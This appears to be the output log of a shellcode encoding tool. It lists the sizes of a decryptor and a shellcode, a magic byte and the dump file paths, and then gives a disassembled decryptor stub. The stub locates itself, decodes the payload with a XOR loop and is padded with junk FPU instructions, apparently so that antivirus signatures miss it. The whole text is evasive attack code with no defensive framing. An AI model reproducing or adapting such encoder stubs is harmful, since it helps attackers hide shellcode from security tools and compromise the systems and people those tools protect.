[+] Decryptor body size = 103 bytes
[+] Shellcode size = 349 bytes
[+] Decryptor + Shellcode size = 452 bytes
[+] Magic byte is F8
[+] Crypto steping = 2 byte(s)
[+] Pass steping = 1 byte(s)
[+] Shellcode dumped to D:\asm\shell.txt.tapion_bin
[+] Written 457 bytes
[+] Shellcode header stored to D:\asm\shell.txt.tapion_bin.h

00401093   68 19F21545      PUSH 4515F219
00401098   5A               POP EDX
00401099   81EA 19F21545    SUB EDX,4515F219
0040109F   68 9058FFE0      PUSH E0FF5890
004010A4   8BC4             MOV EAX,ESP
004010A6   FFD0             CALL EAX
004010A8   68 A9568E4A      PUSH 4A8E56A9
004010AD   5A               POP EDX
004010AE   81EA A9568E4A    SUB EDX,4A8E56A9
004010B4   66:C7C2 6101     MOV DX,161
004010B9   4A               DEC EDX
004010BA   4A               DEC EDX
004010BB   4A               DEC EDX
004010BC   4A               DEC EDX
004010BD   C7C1 6AB23AAB    MOV ECX,AB3AB26A
004010C3   0FC9             BSWAP ECX
004010C5   81E9 FD38B26A    SUB ECX,6AB238FD
004010CB   8BF8             MOV EDI,EAX
004010CD   F5               CMC
004010CE   FF37             PUSH DWORD PTR DS:[EDI]
004010D0   5B               POP EBX
004010D1   47               INC EDI
004010D2   311C01           XOR DWORD PTR DS:[ECX+EAX],EBX
004010D5   803F F8          CMP BYTE PTR DS:[EDI],0F8
004010D8   9B               WAIT
004010D9   DBE3             FINIT
004010DB   D9E9             FLDL2T
004010DD   75 08            JNZ SHORT testsh.004010E7
004010DF   DEF1             FDIVRP ST(1),ST
004010E1   8BF8             MOV EDI,EAX
004010E3   D9F3             FPATAN
004010E5   DDD1             FST ST(1)
004010E7   D9E0             FCHS
004010E9   49               DEC ECX
004010EA   DEC9             FMULP ST(1),ST
004010EC   85FF             TEST EDI,EDI
004010EE   FC               CLD
004010EF   49               DEC ECX
004010F0   4A               DEC EDX
004010F1   4A               DEC EDX
004010F2   D9E0             FCHS
004010F4   09D2             OR EDX,EDX
004010F6   DED9             FCOMPP
004010F8  ^7F D4            JG SHORT testsh.004010CE

